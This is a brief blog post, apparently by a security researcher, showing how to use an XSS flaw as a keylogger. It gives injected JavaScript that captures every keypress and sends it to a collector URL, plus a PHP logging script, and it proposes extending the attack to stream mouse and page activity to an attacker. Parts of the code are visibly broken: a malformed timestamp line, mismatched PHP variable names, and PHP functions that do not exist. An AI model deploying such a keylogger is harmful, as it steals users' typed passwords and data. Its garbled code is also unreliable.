How do you use an xss as a keylogger ?

My name is Ismail Tasdelen. As a security researcher. Today I will be talking about how to use an xss vulnerability as a keylogger. After this post, you’ll notice why a xss vulnerability has a critical vulnerability.

var buffer = [];var url = 'http://localhost/?q='document.onkeypress = function(e) {    var timestamp = | 0;    var stroke = {        k: e.key,        t: timestamp    };    buffer.push(stroke);}window.setInterval(function() {    if (buffer.length > 0) {        var data = encodeURIComponent(JSON.stringify(buffer));        new Image().src = url + data;        buffer = [];    }}, 200);

Using javascript on a php server. You can create a keylogger server.

<?phpif(!empty($_GET['q'])) {    $logfile = fopen('data.txt', 'a+');    file_write($log_file, $_GET['q']);    file_close($log_file);}?>

This story cover a very small part of what a JavaScript backdoor is able to achieve. A good improvement would be to monitor mouse position and DOM element and send everything to the attacker in real-time using WebSockets

And not only that. Remote means you are running malicious javascript code towards the server. The rest is only for your imagination and ability.

Thanks @openbugbounty

Leave a Reply